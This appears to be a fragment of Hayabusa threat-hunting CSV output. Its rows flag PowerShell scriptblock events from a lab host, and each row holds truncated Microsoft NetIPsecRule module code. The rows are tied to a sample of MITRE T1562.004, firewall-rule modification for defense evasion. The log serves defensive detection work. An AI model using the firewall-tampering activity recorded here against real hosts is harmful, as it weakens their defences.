'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 